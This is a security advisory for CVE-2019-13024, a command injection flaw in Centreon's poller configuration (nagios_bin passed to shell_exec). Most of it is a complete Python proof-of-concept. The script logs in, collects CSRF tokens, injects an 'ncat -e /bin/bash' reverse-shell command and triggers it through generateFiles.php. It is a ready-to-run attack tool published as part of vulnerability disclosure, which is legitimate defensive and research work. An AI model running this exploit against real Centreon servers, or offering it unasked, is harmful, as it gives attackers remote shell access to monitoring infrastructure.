Centreon v19.04 Remote Code Execution Vulnerability

Summary

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value “init_script”-“Monitoring Engine Binary” in main.get.php to insert an arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands).

Credit:

The information has been provided by Askar

The original article can be found at: https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/


Details

The exploitation triggers by adding an arbitrary command in the nagios_bin parameter when setup a new configuration or update configuration for a poller, the attacker can control some parameters which are passed to updateServer function on DB-Func.php line #506, this function should update some values and add them to the database, so we can control a user input called nagion_bin from the configuration page and inject our malicious code into it

Proof of Concept:

import requests

import sys

import warnings

from bs4 import BeautifulSoup

# turn off BeautifulSoup warnings

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:

    print(len(sys.argv))

    print("[~] Usage : ./centreon-exploit.py url username password ip port")

    exit()

url = sys.argv[1]

username = sys.argv[2]

password = sys.argv[3]

ip = sys.argv[4]

port = sys.argv[5]

request = requests.session()

print("[+] Retrieving CSRF token to submit the login form")

page = request.get(url+"/index.php")

html_content = page.text

soup = BeautifulSoup(html_content)

token = soup.findAll('input')[3].get("value")

login_info = {

    "useralias": username,

    "password": password,

    "submitLogin": "Connect",

    "centreon_token": token

}

login_request = request.post(url+"/index.php", login_info)

print("[+] Login token is : {0}".format(token))

if "Your credentials are incorrect." not in login_request.text:

    print("[+] Logged In Sucssfully")

    print("[+] Retrieving Poller token")

    poller_configuration_page = url + "/main.get.php?p=60901"

    get_poller_token = request.get(poller_configuration_page)

    poller_html = get_poller_token.text

    poller_soup = BeautifulSoup(poller_html)

    poller_token = poller_soup.findAll('input')[24].get("value")

    print("[+] Poller token is : {0}".format(poller_token))

    payload_info = {

        "name": "Central",

        "ns_ip_address": "127.0.0.1",

        # this value should be 1 always

        "localhost[localhost]": "1",

        "is_default[is_default]": "0",

        "remote_id": "",

        "ssh_port": "22",

        "init_script": "centengine",

        # this value contains the payload , you can change it as you want

        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

        "nagiostats_bin": "/usr/sbin/centenginestats",

        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",

        "centreonbroker_cfg_path": "/etc/centreon-broker",

        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",

        "centreonbroker_logs_path": "",

        "centreonconnector_path": "/usr/lib64/centreon-connector",

        "init_script_centreontrapd": "centreontrapd",

        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",

        "ns_activate[ns_activate]": "1",

        "submitC": "Save",

        "id": "1",

        "o": "c",

        "centreon_token": poller_token,

    }

    send_payload = request.post(poller_configuration_page, payload_info)

    print("[+] Injecting Done, triggering the payload")

    print("[+] Check your netcat listener !")

    generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"

    xml_page_data = {

        "poller": "1",

        "debug": "true",

        "generate": "true",

    }

    request.post(generate_xml_page, xml_page_data)

else:

    print("[-] Wrong credentials")

    exit()

Vulnerable Systems:

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29

CVE Information:
CVE-2019-13024

Disclosure Timeline:
07/01/2019